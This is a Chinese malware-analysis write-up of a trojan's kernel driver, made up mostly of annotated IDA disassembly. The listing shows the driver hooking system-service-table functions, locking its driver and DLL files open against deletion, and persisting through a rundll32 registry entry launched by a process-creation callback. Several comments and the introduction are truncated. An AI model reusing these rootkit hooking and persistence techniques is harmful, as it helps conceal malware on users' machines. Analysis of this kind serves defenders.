【文章标题】: 一个驱动木马的分析
【文章作者】: prince
【作者邮箱】: cracker_prince@163.com
【作者QQ号】: 812937
【软件名称】: Trojan program Trojan-Downloader.Win32.Agent.bbb(卡巴命名)
【下载地址】: http://www.unpack.cn/viewthread.php?tid=8733&extra=page%3D1
【加壳方式】: 无
【编写语言】: ---
【使用工具】: IDA 5.0, WinDbg, VMWare 5.5.
【操作平台】: WINDOWS XP
【软件介绍】: 某木马or恶意软件的driver部分
【作者声明】: 水平有限,了解不多,仅作参考。
大概2个多星期前看到在Unpack『 病毒木马 』区Lvg同学发了这个样本,就用业余时间
.text:00010F5B ; *************** S U B R O U T I N E ***************************************
.text:00010F5B ; int __stdcall start(PDRIVER_OBJECT DriverObject,int)
.text:00010F5B public start
.text:00010F5B start proc near
.text:00010F5B DriverObject = dword ptr 4
.text:00010F5B arg_4 = dword ptr 8
.text:00010F5B push [esp+arg_4] ; RegistryPath
.text:00010F5F call sub_10966 ; 参数为:RegistryPath;
.text:00010F5F ; 修改SDT,hook关键函数
.text:00010F64 test al, al ; 判断hook是否成功
.text:00010F66 jnz short loc_10F6F ; 成功则跳
.text:00010F68 mov eax, 0C0000001h ; 否则返回STATUS_UNSUCCESSFUL
.text:00010F6D jmp short locret_10FD2
.text:00010F6F ; ---------------------------------------------------------------------------
.text:00010F6F loc_10F6F: ; CODE XREF: start+Bj
.text:00010F6F push esi
.text:00010F70 push edi
.text:00010F71 xor edi, edi ; edi清零
.text:00010F73 xor esi, esi ; esi清零
.text:00010F75 inc esi
.text:00010F76 mov dword_1160C, esi ; dword_1160C = 1
.text:00010F7C mov dword_11608, edi ; dword_11608 = 0
.text:00010F82 mov dword_115FC, esi ; dword_115FC = 1
.text:00010F88 mov dword_115F8, edi ; dword_115F8 = 0
.text:00010F8E mov dword_11604, edi ; dword_11604 = 0
.text:00010F94 mov dword_11600, edi ; dword_11600 = 0
.text:00010F9A mov dword_11614, edi ; dword_11614 = 0
.text:00010FA0 mov Handle, edi ; Handle = 0
.text:00010FA6 call sub_10EFF ; 创建线程 - 设置注册表注册驱动和打开
.text:00010FAB call sub_10C61 ; ZwCreateFile打开"\SystemRoot",判
.text:00010FB0 test al, al ; 利用返回值判断是否打开成功
.text:00010FB2 jz short loc_10FBC ; 打开失败则跳
.text:00010FB4 push esi
.text:00010FB5 call sub_106B9 ; 用原始的NtCreateFile打开
.text:00010FB5 ; "\SystemRoot\system32
\drivers\esqyo.sys" 和
.text:00010FB5 ; "\SystemRoot\system32\ydljs.dll"并
.text:00010FB5 ; 目的是防止这两个文件被关闭和删除
.text:00010FBA jmp short loc_10FC5
.text:00010FBC ; ---------------------------------------------------------------------------
.text:00010FBC loc_10FBC: ; CODE XREF: start+57j
.text:00010FBC push [esp+8+DriverObject] ; DriverObject
.text:00010FC0 call sub_10D1B ; 如果出现什么问题则调用
.text:00010FC0 ; 重新再来一遍。狠...
.text:00010FC5 loc_10FC5: ; CODE XREF: start+5Fj
.text:00010FC5 push edi ; Remove - edi = 0 (FALSE - 创建
.text:00010FC6 push offset NotifyRoutine ; NotifyRoutine - (监视函数)
.text:00010FC6 ; 该函数监视explorer.exe进程启动,跟
.text:00010FCB call PsSetCreateProcessNotifyRoutine ; 监视进程创建及销毁
.text:00010FD0 pop edi
.text:00010FD1 pop esi
.text:00010FD2 locret_10FD2: ; CODE XREF: start+12j
.text:00010FD2 retn 8
.text:00010FD2 start endp
.text:00010966 ; arg_0
.text:00010966 sub_10966 proc near ; CODE XREF: start+4p
.text:00010966 arg_0 = dword ptr 8
.text:00010966 push ebx ; arg_0
.text:00010967 call sub_10857 ; 对一些常量字符串进行解码还原
.text:0001096C xor ebx, ebx
.text:0001096E push ebx ; CSDVersion - NULL
.text:0001096F push offset BuildNumber ; BuildNumber
.text:00010974 push offset MinorVersion ; MinorVersion
.text:00010979 push offset MajorVersion ; MajorVersion
.text:0001097E call PsGetVersion ; 获取系统版本号,build number
.text:00010983 call sub_107F0 ; 在当前进程的EPROCESS结构中搜索字符
.text:00010983 ; 返回的偏移值后面要用到
.text:00010988 cmp eax, ebx ; 检查是否搜索到了指定字符串
.text:0001098A mov dword_118F0, eax ; 保存字符串在EPROCESS结构中的偏移,
.text:0001098A ; 即dword_118F0 =
.text:0001098F jnz short loc_10998 ; 找到则跳走
.text:00010991 xor al, al ; 如果没找到指定字符串,则al 清零
.text:00010993 jmp loc_10A2C ; 跳到函数结尾返回
.text:00010998 ; ---------------------------------------------------------------------------
.text:00010998 loc_10998: ; CODE XREF: sub_10966+29j
.text:00010998 push ebp
.text:00010999 push esi
.text:0001099A push edi
.text:0001099B push 40h ; size_t
.text:0001099D push ebx ; int
.text:0001099E mov esi, offset word_11618
.text:000109A3 push esi ; void *
.text:000109A4 call memset ; 变量word_11618清零 (大小为0x40)
.text:000109A9 mov edi, ds:wcsncpy
.text:000109AF push 1Fh ; size_t
.text:000109B1 push offset s_Esqyo ; "esqyo"
.text:000109B6 push esi ; wchar_t *
.text:000109B7 call edi ; wcsncpy ; 拷贝字符串"esqyo"至变量word_11618
.text:000109B9 push 40h ; size_t
.text:000109BB push ebx ; int
.text:000109BC mov esi, offset unk_116A0
.text:000109C1 push esi ; void *
.text:000109C2 call memset ; 将变量unk_116a0清零 (大小为0x40)
.text:000109C7 push 1Fh ; size_t
.text:000109C9 push offset s_Ydljs ; "ydljs"
.text:000109CE push esi ; wchar_t *
.text:000109CF call edi ; wcsncpy ; 拷贝字符串"ydljs"至变量unk_116a0
.text:000109D1 mov ebp, 200h
.text:000109D6 push ebp ; size_t
.text:000109D7 push ebx ; int
.text:000109D8 mov esi, offset unk_116F0
.text:000109DD push esi ; void *
.text:000109DE call memset ; 将变量unk_116f0清零 (大小0x200)
.text:000109E3 push 40h ; size_t
.text:000109E5 push ebx ; int
.text:000109E6 mov ebx, offset word_11658
.text:000109EB push ebx ; void *
.text:000109EC call memset ; 将变量word_11658清零 (大小0x40)
.text:000109F1 add esp, 48h
.text:000109F4 push 1Fh ; size_t
.text:000109F6 push offset s_Ydljs_0 ; "ydljs"
.text:000109FB push ebx ; wchar_t *
.text:000109FC call edi ; wcsncpy ; 拷贝字符串"ydljs"至变量word_11658
.text:000109FE push ebp ; size_t
.text:000109FF push 0 ; int
.text:00010A01 push esi ; void *
.text:00010A02 call memset ; 将变量unk_116f0清零 (大小0x200)
.text:00010A07 mov eax, [esp+24h+arg_0] ; +0x024 HardwareDatabase
.text:00010A07 ; Pointer to the
\Registry\Machine\Hardware path to the hardware configuration information in the registry.
.text:00010A0B movzx ecx, word ptr [eax]
.text:00010A0E push ecx ; size_t
.text:00010A0F push dword ptr [eax+4] ; void *
.text:00010A0F ;
.text:00010A12 push esi ; void *
.text:00010A13 call memcpy ; 将HardwareDatabase字符串拷贝至变量
.text:00010A18 push esi ; wchar_t *
.text:00010A19 call ds:_wcslwr ; 转换为小写字母
.text:00010A19 ;
.text:00010A1F add esp, 28h
.text:00010A22 call sub_10883 ; 修改SDT来HOOK ZwCreateFile、
.text:00010A22 ; ZwEnumerateKey、ZwOpenKey、ZwClose
.text:00010A27 pop edi
.text:00010A28 pop esi
.text:00010A29 mov al, 1 ; 返回1表示成功
.text:00010A2B pop ebp
.text:00010A2C loc_10A2C: ; CODE XREF: sub_10966+2Dj
.text:00010A2C pop ebx
.text:00010A2D retn 4
.text:00010A2D sub_10966 endp
.text:000107F0 sub_107F0 proc near ; CODE XREF: sub_10966+1Dp
.text:000107F0 push ebx
.text:000107F1 push esi
.text:000107F2 push edi
.text:000107F3 call ds:IoGetCurrentProcess ; 获取当前进程的PEPROCESS结构
.text:000107F9 mov ebx, eax ; 保存指针至ebx
.text:000107FB xor edi, edi ; edi清零
.text:000107FD mov esi, offset s_Rxrsdl ; esi指向字符串"System"
.text:00010802 loc_10802: ; CODE XREF: sub_107F0+32j
.text:00010802 push esi ; char *
.text:00010803 call strlen ; 取"System"字符串长度
.text:00010808 push eax ; size_t 比较字符串的长度
.text:00010809 lea eax, [edi+ebx]
.text:0001080C push eax ; char *
.text:0001080D push esi ; char *
.text:0001080E call ds:strncmp ; 比较字符串是否相等
.text:00010814 add esp, 10h
.text:00010817 test eax, eax
.text:00010819 jz short loc_1082A ; 相等就跳
.text:0001081B inc edi
.text:0001081C cmp edi, 3000h ; 遍历EPROCESS结构,搜索指定字符串
.text:00010822 jl short loc_10802
.text:00010824 xor eax, eax ; 没有找到指定字符串,返回0
.text:00010826 loc_10826: ; CODE XREF: sub_107F0+3Cj
.text:00010826 pop edi
.text:00010827 pop esi
.text:00010828 pop ebx
.text:00010829 retn
.text:0001082A ; ---------------------------------------------------------------------------
.text:0001082A loc_1082A: ; CODE XREF: sub_107F0+29j
.text:0001082A mov eax, edi ; 返回指定字符串在EPROCESS中的偏移位
.text:0001082C jmp short loc_10826
.text:0001082C sub_107F0 endp
.text:00010883 sub_10883 proc near ; CODE XREF: sub_10966+BCp
.text:00010883 mov eax, ds:ZwCreateFile
.text:00010888 push ebx
.text:00010889 mov ebx, ds:ZwSetValueKey
.text:0001088F push ebp
.text:00010890 mov ebp, ds:ZwEnumerateKey
.text:00010896 push esi
.text:00010897 mov esi, ds:ZwOpenKey
.text:0001089D push edi
.text:0001089E mov edi, ds:ZwClose
.text:000108A4 mov dword_11698, esi ; ZwOpenKey
.text:000108AA mov dword_116E8, edi ; ZwClose
.text:000108B0 mov dword_116E4, ebx ; ZwSetValueKey
.text:000108B6 mov dword_116E0, ebp ; ZwEnumerateKey
.text:000108BC mov dword_116EC, eax ; ZwCreateFile
.text:000108C1 call sub_110EB ; 得到ntoskrnl.exe,并映射到内存
.text:000108C6 test al, al ; 检查返回值
.text:000108C8 jz loc_1095F ; 失败则跳走
.text:000108CE push esi ; ZwOpenKey
.text:000108CF call sub_111E8 ; 修改SDT,返回一个地址(原始
.text:000108D4 push ebx ; ZwSetValueKey
.text:000108D5 mov dword_11698, eax ; dword_11698 = 原始NtOpenKey函数地
.text:000108DA call sub_111E8
.text:000108DF push ebp ; ZwEnumerateKey
.text:000108E0 mov dword_116E4, eax ; dword_116E4 = 原始NtSetValueKey函
.text:000108E5 call sub_111E8
.text:000108EA push edi ; ZwClose
.text:000108EB mov dword_116E0, eax ; dword_116E0 = 原始NtEnumerateKey函
.text:000108F0 call sub_111E8
.text:000108F5 push ds:ZwCreateFile
.text:000108FB mov dword_116E8, eax ; dword_116E8 = 原始NtClose函数地址
.text:00010900 call sub_111E8
.text:00010905 mov dword_116EC, eax ; dword_116EC = 原始NtCreateFile函数
.text:0001090A call sub_11222 ; 取消映射,关闭section、file等句柄
.text:0001090F xor eax, eax
.text:00010911 cmp dword_11698, eax ; 判断dword_11698(NtOpenKey())是否为
.text:00010917 jz short loc_1093D ; 为零则跳
.text:00010919 cmp dword_116E4, eax ; 判断dword_116E4(NtSetValueKey())是
.text:0001091F jz short loc_1093D
.text:00010921 cmp dword_116E0, eax ; 判断dword_116E0(NtEnumerateKey())
.text:00010927 jz short loc_1093D
.text:00010929 cmp dword_116E8, eax ; 判断dword_116E8(NtClose)是否为空
.text:0001092F jz short loc_1093D
.text:00010931 cmp dword_116EC, eax ; 判断dword_116EC(NtCreateFile)是否
.text:00010937 jz short loc_1093D
.text:00010939 mov al, 1
.text:0001093B jmp short loc_10961 ; 否则返回1
.text:0001093D ; ---------------------------------------------------------------------------
.text:0001093D loc_1093D: ; CODE XREF: sub_10883+94j
.text:0001093D ; sub_10883+9Cj
.text:0001093D ; sub_10883+A4j
.text:0001093D ; sub_10883+ACj
.text:0001093D ; sub_10883+B4j
.text:0001093D mov eax, ds:ZwCreateFile
.text:00010942 mov dword_11698, esi ; esi = ZwOpenKey
.text:00010948 mov dword_116E8, edi ; edi = ZwClose
.text:0001094E mov dword_116E4, ebx ; ebx = ZwSetValueKey
.text:00010954 mov dword_116E0, ebp ; ebp = ZwEnumerateKey
.text:0001095A mov dword_116EC, eax ; eax = ZwCreateFile
.text:0001095F loc_1095F: ; CODE XREF: sub_10883+45j
.text:0001095F xor al, al ; 返回0
.text:00010961 loc_10961: ; CODE XREF: sub_10883+B8j
.text:00010961 pop edi
.text:00010962 pop esi
.text:00010963 pop ebp
.text:00010964 pop ebx
.text:00010965 retn
.text:00010965 sub_10883 endp
.text:000111E8 sub_111E8 proc near ; CODE XREF: sub_10883+4Cp
.text:000111E8 ; sub_10883+57p
.text:000111E8 ; sub_10883+62p
.text:000111E8 ; sub_10883+6Dp
.text:000111E8 ; sub_10883+7Dp
.text:000111E8 arg_0 = dword ptr 4
.text:000111E8 mov eax, BaseAddress
.text:000111ED test eax, eax
.text:000111EF jz short locret_1121F ; 基址为空则返回
.text:000111F1 mov ecx, [esp+arg_0] ; ecx = 压栈的函数地址
.text:000111F5 mov ecx, [ecx+1] ; 取该函数的在SDT中的索引号(magic
.text:000111F5 ; 根据反汇编Zw**可以得知,函数入口处
+1的值即是magic number
.text:000111F8 test ch, 30h
.text:000111FB push esi
.text:000111FC jnz short loc_1121C
.text:000111FE push ecx ; ecx = 入栈函数在SDT中的索引号
.text:000111FF push eax ; eax = BaseAddress
.text:00011200 push dword_11904 ; dword_11904为ntoskrnl.exe的基址
.text:00011206 call sub_10C07 ; 修改SDT,替换函数入口,返回原始函数
.text:0001120B mov esi, eax ; 保存返回的地址
.text:0001120D push esi ; VirtualAddress
.text:0001120E call ds:MmIsAddressValid ; 检查该地址的有效性
.text:00011214 test al, al
.text:00011216 jz short loc_1121C ; 如果地址不可用则跳走
.text:00011218 mov eax, esi ; 否则保留该地址为此函数的返回值
.text:0001121A jmp short loc_1121E
.text:0001121C ; ---------------------------------------------------------------------------
.text:0001121C loc_1121C: ; CODE XREF: sub_111E8+14j
.text:0001121C ; sub_111E8+2Ej
.text:0001121C xor eax, eax ; 返回值置零,表示失败
.text:0001121E loc_1121E: ; CODE XREF: sub_111E8+32j
.text:0001121E pop esi
.text:0001121F locret_1121F: ; CODE XREF: sub_111E8+7j
.text:0001121F retn 4
.text:0001121F sub_111E8 endp
hook SDT的代码,网上多得很,我这里没有仔细分析。简单用Windbg跟了一下,察看sub_10C07函数返回
的地址,在Windbg中用 uf 命令来反汇编压栈的函数,看看地址是否吻合;或者用 ln 命令直接察看该地
址也可以。所以可以猜测hook函数原型是:NTPROC* HookFuncBySdt(NTPROC *Zw***);
.text:00010F35 add esp, 18h
.text:00010F38 push offset sub_104D0 ; StartContext (回调函数的参数)
.text:00010F3D push edi ; StartRoutine
.text:00010F3E push esi ; ClientId
.text:00010F3F push esi ; ProcessHandle
.text:00010F40 push esi ; ObjectAttributes
.text:00010F41 push esi ; DesiredAccess
.text:00010F42 lea eax, [ebp+Handle]
.text:00010F45 push eax ; ThreadHandle
.text:00010F46 call ds:PsCreateSystemThread ; 创建线程 sub_10EEF
.text:00010DC5 ; void __stdcall StartRoutine(PVOID)
.text:00010DC5 StartRoutine proc near ; DATA XREF: NotifyRoutine+D6o
.text:00010DC5 Interval = LARGE_INTEGER ptr -8
.text:00010DC5 push ebp
.text:00010DC6 mov ebp, esp
.text:00010DC8 push ecx
.text:00010DC9 push ecx
.text:00010DCA or dword ptr [ebp+Interval+4], 0FFFFFFFFh
.text:00010DCE lea eax, [ebp+Interval]
.text:00010DD1 push eax ; Interval
.text:00010DD2 push 0 ; Alertable
.text:00010DD4 push 0 ; WaitMode
.text:00010DD6 mov dword ptr [ebp+Interval], 0FA0A1F00h
.text:00010DDD call ds:KeDelayExecutionThread
.text:00010DE3 push 1
.text:00010DE5 call sub_106B9 ; 打开驱动和dll文件
.text:00010DEA push 1 ; ExitStatus
.text:00010DEC call ds:PsTerminateSystemThread
.text:00010DF2 leave
.text:00010DF3 retn 4
.text:00010DF3 StartRoutine endp
.text:000106B9 SourceString = word ptr -100h
.text:000106B9 arg_0 = dword ptr 8
.text:000106B9 push ebp
.text:000106BA mov ebp, esp
.text:000106BC sub esp, 100h
.text:000106C2 and [ebp+SourceString], 0
.text:000106CA push ebx
.text:000106CB push esi
.text:000106CC push edi
.text:000106CD push 3Fh
.text:000106CF pop ecx
.text:000106D0 xor eax, eax
.text:000106D2 lea edi, [ebp-0FEh]
.text:000106D8 rep stosd
.text:000106DA stosw
.text:000106DC mov edi, 100h
.text:000106E1 push edi ; size_t
.text:000106E2 lea eax, [ebp+SourceString]
.text:000106E8 push 0 ; int
.text:000106EA push eax ; void *
.text:000106EB call memset ; SourceString清零
.text:000106F0 mov esi, ds:swprintf
.text:000106F6 push offset word_11618 ; word_11618 == 字符串"esqyo"
.text:000106FB push offset asc_1139E ; 解码后asc_1139E ==
.text:00010700 lea eax, [ebp+SourceString]
.text:00010706 push offset s_SS_sys ; "%s%s.sys"
.text:0001070B push eax ; wchar_t *
.text:0001070C call esi ; swprintf ; 格式化后的字符串
.text:0001070E mov ebx, ds:ZwClose
.text:00010714 add esp, 1Ch
.text:00010717 cmp [ebp+arg_0], 1 ; 检查压栈参数(打开文件是否成功)
.text:0001071B jnz short loc_10741 ; 打开文件失败则跳走
.text:0001071D mov eax, Handle ; esqyo.sys文件句柄
.text:00010722 test eax, eax
.text:00010724 jz short loc_10730 ; 句柄为空则跳
.text:00010726 push eax ; Handle
.text:00010727 call ebx ; ZwClose ; 否则,关闭之
.text:00010729 and Handle, 0 ; Handle清零
.text:00010730 loc_10730: ; CODE XREF: sub_106B9+6Bj
.text:00010730 push offset dword_115F8 ; int - dword_115F8 = 0
.text:00010735 lea eax, [ebp+SourceString]
.text:0001073B push eax ; SourceString =
.text:0001073C call sub_10440 ; CreateFile打开该文件
.text:00010741 loc_10741: ; CODE XREF: sub_106B9+62j
.text:00010741 cmp [ebp+arg_0], 0 ; 检查压栈参数(打开文件是否成功)
.text:00010745 jnz short loc_1076B ; 打开成功则跳走
.text:00010747 mov eax, dword_115F8 ; dword_115F8 = 0
.text:0001074C test eax, eax
.text:0001074E jz short loc_1075A ; 如果为0则跳走
.text:00010750 push eax ; Handle
.text:00010751 call ebx ; ZwClose ; 不为0则将该句柄关闭
.text:00010753 and dword_115F8, 0 ; 将其清零
.text:0001075A loc_1075A: ; CODE XREF: sub_106B9+95j
.text:0001075A push offset Handle ; int - Handle = 0
.text:0001075F lea eax, [ebp+SourceString] ; SourceString =
.text:00010765 push eax ; SourceString
.text:00010766 call sub_10440 ; 再次尝试NtCreateFile打开该文件
.text:0001076B loc_1076B: ; CODE XREF: sub_106B9+8Cj
.text:0001076B push edi ; size_t
.text:0001076C lea eax, [ebp+SourceString]
.text:00010772 push 0 ; int
.text:00010774 push eax ; void *
.text:00010775 call memset ; SourceString清零
.text:0001077A push offset unk_116A0 ; unk_116A0 = "ydljs"
.text:0001077F push offset asc_113DA ; asc_113DA解码后
.text:00010784 lea eax, [ebp+SourceString]
.text:0001078A push offset s_SS_dll ; "%s%s.dll"
.text:0001078F push eax ; wchar_t *
.text:00010790 call esi ; swprintf ; SourceString =
.text:00010792 add esp, 1Ch
.text:00010795 cmp [ebp+arg_0], 1 ; 判断压栈参数
.text:00010799 jnz short loc_107BF ; 如果arg_0 != 1则跳走不执行打开该文
.text:0001079B mov eax, dword_11600 ; dword_11600 == 0
.text:000107A0 test eax, eax
.text:000107A2 jz short loc_107AE ; 如果dword_11600为0则跳去打开此文件
.text:000107A4 push eax ; Handle
.text:000107A5 call ebx ; ZwClose ; 否则将该句柄关闭
.text:000107A7 and dword_11600, 0 ; dword_11600清零
.text:000107AE loc_107AE: ; CODE XREF: sub_106B9+E9j
.text:000107AE push offset dword_11608 ; int - dword_11608 == 0
.text:000107B3 lea eax, [ebp+SourceString]
.text:000107B9 push eax ; SourceString - SourceString =
.text:000107BA call sub_10440 ; 调用原始的NtCreateFile打开该文件
.text:000107BF loc_107BF: ; CODE XREF: sub_106B9+E0j
.text:000107BF cmp [ebp+arg_0], 0 ; 判断压栈参数是否为0
.text:000107C3 jnz short loc_107E9 ; 不为0则跳走直接返回
.text:000107C5 mov eax, dword_11608
.text:000107CA test eax, eax ; 判断dword_11608是否为0
.text:000107CC jz short loc_107D8 ; 如果dword_11608为0则跳去打开该dll
.text:000107CE push eax ; Handle
.text:000107CF call ebx ; ZwClose ; 否则将其关闭
.text:000107D1 and dword_11608, 0 ; dword_11608 = 0
.text:000107D8 loc_107D8: ; CODE XREF: sub_106B9+113j
.text:000107D8 push offset dword_11600 ; int - dword_11600 = 0
.text:000107DD lea eax, [ebp+SourceString]
.text:000107E3 push eax ; SourceString - SourceString =
.text:000107E4 call sub_10440 ; 用原始的NtCreateFile函数打开该dll
.text:000107E9 loc_107E9: ; CODE XREF: sub_106B9+10Aj
.text:000107E9 pop edi
.text:000107EA pop esi
.text:000107EB pop ebx
.text:000107EC leave
.text:000107ED retn 4
.text:000107ED sub_106B9 endp
.text:00010DF6 ; void __stdcall NotifyRoutine(HANDLE,HANDLE,BOOLEAN)
.text:00010DF6 NotifyRoutine proc near ; DATA XREF: start+6Bo
.text:00010DF6 SourceString = word ptr -210h
.text:00010DF6 var_10 = byte ptr -10h
.text:00010DF6 Handle = dword ptr 0Ch
.text:00010DF6 arg_8 = byte ptr 10h
.text:00010DF6 push ebp
.text:00010DF7 mov ebp, esp
.text:00010DF9 sub esp, 210h
.text:00010DFF push ebx
.text:00010E00 xor ebx, ebx ; ebx = 0
.text:00010E02 cmp [ebp+arg_8], bl ; 判断是否是进程销毁事件
.text:00010E05 jz loc_10EEA ; 是的话跳走返回(不关心进程销毁)
.text:00010E0B cmp [ebp+Handle], 14h
.text:00010E0F jb loc_10EEA ; 如果Handle < 0x14的话也直接返回
.text:00010E15 lea eax, [ebp+arg_8]
.text:00010E18 push eax ; 进程ID
.text:00010E19 push [ebp+Handle] ; EPROCESS buffer
.text:00010E1C mov dword ptr [ebp+arg_8], ebx
.text:00010E1F call ds:PsLookupProcessByProcessId
.text:00010E25 test eax, eax ; 判断结果是否成功
.text:00010E27 jl loc_10EEA
.text:00010E2D mov ecx, dword ptr [ebp+arg_8] ; ecx = EPROCESS
.text:00010E30 xor eax, eax ; eax = 0
.text:00010E32 push esi
.text:00010E33 push edi
.text:00010E34 mov [ebp+var_10], bl
.text:00010E37 lea edi, [ebp-0Fh]
.text:00010E3A stosd
.text:00010E3B stosd
.text:00010E3C stosd
.text:00010E3D stosw
.text:00010E3F stosb
.text:00010E40 mov eax, dword_118F0 ; dword_118F0 是字符串"System"在
.text:00010E40 ; 也就是EPROCESS.ImageFileName
.text:00010E45 add eax, ecx ; 定位偏移地址
.text:00010E47 push 0Fh ; size_t
.text:00010E49 push eax ; char *
.text:00010E4A lea eax, [ebp+var_10]
.text:00010E4D push eax ; char *
.text:00010E4E call ds:strncpy
.text:00010E54 mov esi, ds:_stricmp
.text:00010E5A lea eax, [ebp+var_10]
.text:00010E5D push offset s_Trdqhmhs-dwd ; s_Trdqhmhs-dwd解码后
.text:00010E62 push eax ; char *
.text:00010E63 call esi ; _stricmp ; 比较字符串
.text:00010E65 add esp, 14h
.text:00010E68 test eax, eax ; 判断结果
.text:00010E6A jnz short loc_10EBA ; 不是指定进程则跳
.text:00010E6C push 7Fh
.text:00010E6E pop ecx
.text:00010E6F mov [ebp+SourceString], bx
.text:00010E76 lea edi, [ebp-20Eh]
.text:00010E7C rep stosd
.text:00010E7E push 200h ; size_t
.text:00010E83 stosw
.text:00010E85 lea eax, [ebp+SourceString]
.text:00010E8B push ebx ; int
.text:00010E8C push eax ; void *
.text:00010E8D call memset ; 否则对SourceString进行清零
.text:00010E92 push offset unk_116A0 ; unk_116A0 = "ydljs"
.text:00010E97 lea eax, [ebp+SourceString]
.text:00010E9D push offset s_SystemrootSys ; "%%systemroot%%\\system32
\\Rundll32.exe %%"...
.text:00010EA2 push eax ; wchar_t *
.text:00010EA3 call ds:swprintf ; SourceString =
.text:00010EA3 ; "%systemroot%\system32\Rundll32.exe
.text:00010EA9 add esp, 18h
.text:00010EAC lea eax, [ebp+SourceString]
.text:00010EB2 push eax ; SourceString
.text:00010EB3 call sub_10D2F ; 写注册表,用rundll32.exe在启动的时
.text:00010EB8 jmp short loc_10EE8
.text:00010EBA ; ---------------------------------------------------------------------------
.text:00010EBA loc_10EBA: ; CODE XREF: NotifyRoutine+74j
.text:00010EBA lea eax, [ebp+var_10]
.text:00010EBD push offset s_Explorer_exe ; "explorer.exe"
.text:00010EC2 push eax ; char *
.text:00010EC3 call esi ; _stricmp ; 判断进程名字是否是explorer.exe
.text:00010EC5 test eax, eax
.text:00010EC7 pop ecx
.text:00010EC8 pop ecx
.text:00010EC9 jnz short loc_10EE8 ; 不是则跳走返回
.text:00010ECB push ebx ; StartContext
.text:00010ECC push offset StartRoutine ; StartRoutine
.text:00010ECC ; 该函数用来打开驱动和dll文件
.text:00010ED1 push ebx ; ClientId
.text:00010ED2 push ebx ; ProcessHandle
.text:00010ED3 push ebx ; ObjectAttributes
.text:00010ED4 push ebx ; DesiredAccess
.text:00010ED5 lea eax, [ebp+Handle]
.text:00010ED8 push eax ; ThreadHandle
.text:00010ED9 call ds:PsCreateSystemThread
.text:00010EDF push [ebp+Handle] ; Handle
.text:00010EE2 call ds:ZwClose ; 关闭该线程
.text:00010EE8 loc_10EE8: ; CODE XREF: NotifyRoutine+C2j
.text:00010EE8 ; NotifyRoutine+D3j
.text:00010EE8 pop edi
.text:00010EE9 pop esi
.text:00010EEA loc_10EEA: ; CODE XREF: NotifyRoutine+Fj
.text:00010EEA ; NotifyRoutine+19j
.text:00010EEA ; NotifyRoutine+31j
.text:00010EEA pop ebx
.text:00010EEB leave
.text:00010EEC retn 0Ch
.text:00010EEC NotifyRoutine endp
systemroot%\system32\Rundll32.exe %systemroot%\system32\ydljs.dll,DllUnregisterServer"。如果
2006年12月28日 18:22 by prince